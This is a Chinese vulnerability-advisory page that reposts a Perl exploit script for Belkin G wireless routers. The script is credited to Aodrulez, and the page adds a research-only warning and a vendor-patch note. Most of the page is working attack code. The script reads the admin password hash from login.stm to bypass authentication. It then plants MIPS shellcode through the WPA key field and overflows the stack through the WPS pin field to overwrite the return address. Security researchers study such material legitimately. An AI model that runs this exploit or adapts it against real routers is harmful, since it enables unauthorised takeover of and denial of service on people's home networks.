链接:http://packetstormsecurity.com/files/122956/belking-exec.txt *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perluse strict; use warnings; use LWP 5.64; $| = 1;# Variable declarations. my $browser = LWP::UserAgent->new; my $passHash=""; my $url =""; my $response =""; my $ip=""; $browser ->timeout(10); # Just a few nops followed by a dummy shellcode that crashes & reboots the router. my $shellcode="x20x20x20x20x20x20x20x20x20x20x20x20x04xd0xffxffx20x20x20x20"; sub Authenticate() { print "[+] Trying to authenticate.
"; $url= "http://$ip/login.stm"; $response = $browser->get( $url); my @aod= $response->content =~ m/var password = "(.*)";/g; if(!$aod[0]) { print "[-] Damn! Something went wrong. This might not work here :-/
"; exit; } else { $passHash=$aod[0]; print "[+] Admin Password = $passHash (MD5 Hash).
"; }print "[+] Time to authenticate you!
"; $url = "http://$ip/cgi-bin/login.exe"; $response = $browser->post( $url, [ "totalMSec" => "1377121454.99", "pws" => "$passHash", ,] );
if( $response->content =~ /index/ ) { print "[+] Logged in successfully as "Admin"!
"; print "[!] Open this link in a browser for admin access : http://$ip/setup.htm
"; } else { print "[-] Login failed! This might not work here :-/
"; exit; } print "
[+] Continue with exploitation? (Y/N) : "; my $temp=<STDIN>; if ($temp=~"Y" || $temp=~"y") { Exploit(); } else { print "[+] Have fun!
"; exit; } } sub Exploit() { # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes) # 0x803c0278 is fixed for this device/firmware combination. print "[+] Stage 1 : Allocating shellcode.
"; if (length($shellcode) > 120) { print "[-] Shellcode is too big! (120 bytes Max)
"; exit; } print "[+] Shellcode length : ".length($shellcode)."
"; # Fill the rest with nops. Not needed but good to have. # Shellcode size should be ideally a multiple of 4 as this is MIPS. my $nopsize=120-length($shellcode); $shellcode=$shellcode.("x20"x$nopsize);$url = "http://$ip/cgi-bin/wireless_WPA.exe"; $response = $browser->post( $url, [ "wpa_authen" => "1", "wpa_psk" => "0", "s_rekeysec" => "900000", "s_rekeypkt" => "1000", "w802_rekey" => "0", "encryption" => "3", "security_type" => "4", "authentication" => "3", "encryption_hid" => "3", "wpa_key_text" => "ssss", "wpa_key_pass" => "$shellcode", "obscure_psk" => "1", "sharedkey_alter" => "", "sharedkey_alter1" => "1",
,] );
if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here :-/
"; } else { print "[+] Stage 1 seems to have gone well.
"; }# Stage 2: Trigger Stack Overflow & overwrite RA print "[+] Stage 2 : Triggering Return Address overwrite.
";my $junk="A"x32; my $s0="BBBB"; my $s1="CCCC"; my $ra="x78x02x3cx80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination. my $nop="x20x20x20x20"; my $payload=$junk.$s0.$s1.$ra.$nop;$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe"; $response = $browser->post( $url,[ "pin" => "$payload"]); if( !$response->content ) { print "[-] Damn! Something went wrong. This might not work here :-/
"; } else { print "[-] Done! \m/
"; }}sub Welcome() { print "
+------------------------------------------+
"; print "| Belkin G Wireless Router Remote Exploit |
"; print "| (Authentication bypass & RCE PoC) |
"; print "+------------------------------------------+
"; print "[+] By Aodrulez.
"; print "
[+] Usage : perl $0 router_ip"; print "
[!] Example : perl $0 X.X.X.X"; if (!$ARGV[0]) { print "
[-] (o_0) Seriously??
"; exit; } $ip=$ARGV[0]; print "
[+] Target IP : $ip
";}# Burn!! Welcome(); Authenticate(); # End of exploit code.建议: -------------------------------------------------------------------------------- 厂商补丁:Belkin ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.belkin.com/us/support-article?rnId=306Real Networks RealPlayer栈缓冲区溢出漏洞(CVE-2013-4973)Linux Kernel空指针引用本地拒绝服务漏洞相关资讯 Belkin F5D7234-4 G 本文评论 查看全部评论 (0)
易网时代-编程资源站